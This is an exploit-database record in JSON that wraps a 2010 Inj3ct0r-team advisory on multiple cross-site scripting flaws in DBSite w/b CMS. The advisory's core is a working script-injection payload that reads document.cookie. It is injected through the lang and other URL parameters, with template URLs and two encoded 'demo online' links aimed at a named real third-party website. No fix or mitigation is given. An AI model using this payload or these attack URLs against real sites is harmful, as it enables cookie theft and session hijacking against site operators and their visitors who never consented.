{"id": "PACKETSTORM:88727", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "DBSite w/b CMS Cross Site Scripting", "description": "", "published": "2010-04-20T00:00:00", "modified": "2010-04-20T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/88727/DBSite-w-b-CMS-Cross-Site-Scripting.html", "reporter": "OuTLaWz", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2016-11-03T10:28:00", "viewCount": 9, "enchantments": {"score": {"value": -0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.1}, "_state": {"dependencies": 1678912101, "score": 1678911848, "epss": 1678924918}, "_internal": {"score_hash": "8c4d52ed6da8551d729ed6b6a48f401a"}, "sourceHref": "https://packetstormsecurity.com/files/download/88727/dbsite-xss.txt", "sourceData": "` \n \n========================================= \nDBSite w/b CMS Multiple XSS Vulnerability \n========================================= \n \n \n1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 \n0 _ __ __ __ 1 \n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0 \n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1 \n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0 \n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1 \n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0 \n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1 \n1 \\ \\____/ >> Exploit database separated by exploit 0 \n0 \\/___/ type (local, remote, DoS, etc.) 1 \n1 1 \n0 [+] Site : Inj3ct0r.com 0 \n1 [+] Support e-mail : submit[at]inj3ct0r.com 1 \n0 0 \n1 ########################################### 1 \n0 I'm The_Exploited member from Inj3ct0r Team 1 \n1 ########################################### 0 \n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 \n \n[+] Discovered By: The_Exploited \n \n@Title: DBSite w/b CMS Multiple XSS Vulnerability \n \n@Author: The_Exploited aka l3d aka Spoof \n \n@Mail: spoof@live.it \n \n@Site: http://site.securityspl0its.com/ - http://forum.securityspl0its.com/ \n \n@Exploit: \"><script>alert(document.cookie);</script> \n \n@Demo 1: http://www.mysite.com/dbsite/index.php?page=default&id=1&&lang=[XSS] \n \n@Demo 2: http://www.mysite.com/dbsite/index.php?page=default&id=1&lang=&[PATH]=[XSS] \n \n@Demo online 1: http://www.pratoturismo.it/index.php?page=default&id=8&lang=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \n \n@Demo online 2: http://www.pratoturismo.it/index.php?page=default&id=16&lang=&comune=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E \n \n@CMS Version: All \n \n@CMS Download: http://www.liberologico.com/www/index.php?idx_menu=2&idx_subMenu=0&ID_scheda=31 \n \n \n# Inj3ct0r.com [2010-04-21] \n`\n"}
{}